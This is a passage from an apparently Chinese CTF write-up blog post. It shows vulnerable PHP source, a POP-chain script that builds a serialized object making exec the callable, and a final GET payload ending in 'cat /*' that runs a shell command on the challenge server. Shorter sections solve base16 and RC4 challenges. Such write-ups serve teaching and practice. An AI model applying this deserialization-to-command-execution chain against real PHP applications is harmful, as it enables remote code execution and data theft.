var_dump($___);</span><br><span class="line">                <span class="keyword">if</span> (isset($___[<span class="string">&#x27;h_in.t&#x27;</span>])) &#123;</span><br><span class="line">                        unset($___[<span class="string">&#x27;h_in.t&#x27;</span>]);</span><br><span class="line">                &#125;</span><br><span class="line">                var_dump($___);</span><br><span class="line">                echo <span class="meta">@call_user_func($_, ...$___)</span>; </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">d</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $UUU;</span><br><span class="line">    <span class="keyword">public</span> $uuu;</span><br><span class="line">    <span class="keyword">public</span> function <span class="title function_">__wakeup</span><span class="params">()</span>&#123;</span><br><span class="line">                echo $<span class="built_in">this</span>-&gt;UUU;</span><br><span class="line">    &#125;</span><br><span class="line">        <span class="keyword">public</span> function <span class="title function_">__destruct</span><span class="params">()</span>&#123;</span><br><span class="line">                $<span class="built_in">this</span>-&gt;UUU;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(isset($_GET[<span class="string">&#x27;h_in.t&#x27;</span>]))&#123;</span><br><span class="line">        unserialize($_GET[<span class="string">&#x27;h_in.t&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>发现是一个反序列化，这里就当时没看清题</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/hello/&#x27;</span>, OVO))&#123;</span><br><span class="line">                       <span class="keyword">if</span> ($<span class="built_in">this</span>-&gt;OVO === <span class="string">&quot;hello&quot;</span>) &#123;</span><br><span class="line">                               <span class="keyword">return</span> $<span class="built_in">this</span>-&gt;OAO-&gt;QAQ;</span><br><span class="line">                       &#125;        </span><br><span class="line">               &#125;</span><br></pre></td></tr></table></figure>
<p>这里的OVO都不是这个类的，所以根本不用绕过，直接传OVO=hello即可，下面就可以去调用链子</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">a</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $OAO;</span><br><span class="line">    <span class="keyword">public</span> $QAQ;</span><br><span class="line">    <span class="keyword">public</span> $OVO=<span class="string">&quot;hello&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">b</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $pap=<span class="string">&quot;phpinfo&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> $vqv;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">d</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $UUU;</span><br><span class="line">    <span class="keyword">public</span> $uuu;</span><br><span class="line">&#125;</span><br><span class="line">$a=<span class="keyword">new</span> <span class="title class_">d</span>();</span><br><span class="line">$a-&gt;UUU=<span class="keyword">new</span> <span class="title class_">a</span>();</span><br><span class="line">$a-&gt;UUU-&gt;OAO=<span class="keyword">new</span> <span class="title class_">b</span>();</span><br><span class="line">echo <span class="title function_">serialize</span><span class="params">($a)</span>;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这里首先可以读取phpinfo,参数合理化h[in.t即可，后面看到这里有很多的函数都给过滤了，但是exec没有</p>
<p><img src="https://luokuang1.github.io/images/wucup6.png" width="95%" height="80%"></p>
<p>下面就可以尝试通过exec来命令执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> function <span class="title function_">__invoke</span><span class="params">()</span>&#123;</span><br><span class="line">                <span class="meta">@$_</span> = $<span class="built_in">this</span>-&gt;OOO;</span><br><span class="line">                $___ = $_GET;</span><br><span class="line">                var_dump($___);</span><br><span class="line">                <span class="keyword">if</span> (isset($___[<span class="string">&#x27;h_in.t&#x27;</span>])) &#123;</span><br><span class="line">                        unset($___[<span class="string">&#x27;h_in.t&#x27;</span>]);</span><br><span class="line">                &#125;</span><br><span class="line">                var_dump($___);</span><br><span class="line">                echo <span class="meta">@call_user_func($_, ...$___)</span>; </span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>这里的invoke里面会将get提交的参数传给$<strong><em>，这个具体是一个数组，后面就会删除h_in.t参数值，所以$</em></strong>的值就是我们可以控制的了，下面就可以直接传参来执行命令</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">a</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $OAO;</span><br><span class="line">    <span class="keyword">public</span> $QAQ;</span><br><span class="line">        <span class="keyword">public</span> $OVO=<span class="string">&quot;hello&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">b</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $pap;</span><br><span class="line">        <span class="keyword">public</span> $vqv;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">c</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $OOO=<span class="string">&quot;exec&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">d</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $UUU;</span><br><span class="line">    <span class="keyword">public</span> $uuu;</span><br><span class="line">&#125;</span><br><span class="line">$a=<span class="keyword">new</span> <span class="title class_">d</span>();</span><br><span class="line">$a-&gt;UUU=<span class="keyword">new</span> <span class="title class_">a</span>();</span><br><span class="line">$a-&gt;UUU-&gt;OAO=<span class="keyword">new</span> <span class="title class_">b</span>();</span><br><span class="line">$a-&gt;UUU-&gt;OAO-&gt;pap=<span class="keyword">new</span> <span class="title class_">c</span>();</span><br><span class="line">echo <span class="title function_">serialize</span><span class="params">($a)</span>;</span><br><span class="line"><span class="comment">//O:1:&quot;d&quot;:2:&#123;s:3:&quot;UUU&quot;;O:1:&quot;a&quot;:3:&#123;s:3:&quot;OAO&quot;;O:1:&quot;b&quot;:2:&#123;s:3:&quot;pap&quot;;O:1:&quot;c&quot;:1:&#123;s:3:&quot;OOO&quot;;s:4:&quot;exec&quot;;&#125;s:3:&quot;vqv&quot;;N;&#125;s:3:&quot;QAQ&quot;;N;s:3:&quot;OVO&quot;;s:5:&quot;hello&quot;;&#125;s:3:&quot;uuu&quot;;N;&#125; </span></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>如果上传一个字母参数就会不成功，这里可能是因为…$<em>_</em>的原因，但时直接参数数字就可以了,也是尝试了很久还以为又出错了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?h[in.t=O:<span class="number">1</span>:<span class="string">&quot;d&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;UUU&quot;</span>;O:<span class="number">1</span>:<span class="string">&quot;a&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;OAO&quot;</span>;O:<span class="number">1</span>:<span class="string">&quot;b&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;pap&quot;</span>;O:<span class="number">1</span>:<span class="string">&quot;c&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;OOO&quot;</span>;s:<span class="number">4</span>:<span class="string">&quot;exec&quot;</span>;&#125;s:<span class="number">3</span>:<span class="string">&quot;vqv&quot;</span>;N;&#125;s:<span class="number">3</span>:<span class="string">&quot;QAQ&quot;</span>;N;s:<span class="number">3</span>:<span class="string">&quot;OVO&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;hello&quot;</span>;&#125;s:<span class="number">3</span>:<span class="string">&quot;uuu&quot;</span>;N;&#125;&amp;<span class="number">1</span>=cat <span class="comment">/*</span></span><br></pre></td></tr></table></figure>
<h3 id="Misc-Sign"><a href="#Misc-Sign" class="headerlink" title="Misc-Sign"></a>Misc-Sign</h3><p>这个就很简单了，就是一个base16解码得flag</p>
<h3 id="Easy"><a href="#Easy" class="headerlink" title="Easy"></a>Easy</h3><p>这个题考RC4，给了key解码flag</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">def <span class="title function_">rc4</span><span class="params">(key)</span>:</span><br><span class="line">    key_length = len(key)</span><br><span class="line">    s = list(range(<span class="number">256</span>))</span><br><span class="line">    j = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">256</span>)</span>:</span><br><span class="line">        j = (j + s[i] + ord(key[i % key_length])) % <span class="number">256</span></span><br><span class="line">        s[i], s[j] = s[j], s[i]</span><br><span class="line">    <span class="keyword">return</span> s</span><br><span class="line"></span><br><span class="line">def <span class="title function_">rc4_decrypt</span><span class="params">(ciphertext, key)</span>:</span><br><span class="line">    key_length = len(key)</span><br><span class="line">    s = rc4(key)</span><br><span class="line">    i = j = <span class="number">0</span></span><br><span class="line">    plaintext = []</span><br><span class="line">    <span class="keyword">for</span> <span class="type">byte</span> in ciphertext:</span><br><span class="line">        i = (i + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line">        j = (j + s[i]) % <span class="number">256</span></span><br><span class="line">        s[i], s[j] = s[j], s[i]</span><br><span class="line">        x = (s[i] + s[j]) % <span class="number">256</span></span><br><span class="line">        plaintext.append(<span class="type">byte</span> ^ s[x])</span><br><span class="line">    <span class="keyword">return</span> plaintext</span><br><span class="line"></span><br><span class="line"># 密钥</span><br><span class="line">key = <span class="string">&quot;hello world&quot;</span></span><br><span class="line"></span><br><span class="line"># 密文（十六进制字符串）</span><br><span class="line">ciphertext_hex = [</span><br><span class="line">    <span class="string">&quot;d8d2&quot;</span>, <span class="string">&quot;963e&quot;</span>, <span class="string">&quot;0d8a&quot;</span>, <span class="string">&quot;b853&quot;</span>, <span class="string">&quot;3d2a&quot;</span>, <span class="string">&quot;7fe2&quot;</span>, <span class="string">&quot;96c5&quot;</span>, <span class="string">&quot;2923&quot;</span>,</span><br><span class="line">    <span class="string">&quot;3924&quot;</span>, <span class="string">&quot;6eba&quot;</span>, <span class="string">&quot;0d29&quot;</span>, <span class="string">&quot;2d57&quot;</span>, <span class="string">&quot;5257&quot;</span>, <span class="string">&quot;8359&quot;</span>, <span class="string">&quot;322c&quot;</span>, <span class="string">&quot;3a77&quot;</span>,</span><br><span class="line">    <span class="string">&quot;892d&quot;</span>, <span class="string">&quot;fa72&quot;</span>, <span class="string">&quot;61b8&quot;</span>, <span class="string">&quot;4f&quot;</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line"># 将十六进制字符串转换为字节</span><br><span class="line">ciphertext = bytes.fromhex(<span class="string">&#x27;&#x27;</span>.join(ciphertext_hex))</span><br><span class="line"></span><br><span class="line"># 解密</span><br><span class="line">plaintext_bytes = rc4_decrypt(ciphertext, key)</span><br><span class="line"></span><br><span class="line"># 将字节序列转换为字符串</span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    flag = <span class="string">&#x27;&#x27;</span>.join(chr(<span class="type">byte</span>) <span class="keyword">for</span> <span class="type">byte</span> in plaintext_bytes)</span><br><span class="line">    print(<span class="string">&quot;Flag:&quot;</span>, flag)</span><br><span class="line">except UnicodeEncodeError as e:</span><br><span class="line">    print(<span class="string">&quot;Flag contains non-UTF-8 characters:&quot;</span>, plaintext_bytes)</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/11/14/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="Shiro反序列化">
                  <i class="fa fa-angle-left"></i> Shiro反序列化
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/12/18/RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="next" title="RMI反序列化">
                  RMI反序列化 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">luokuang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>




    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
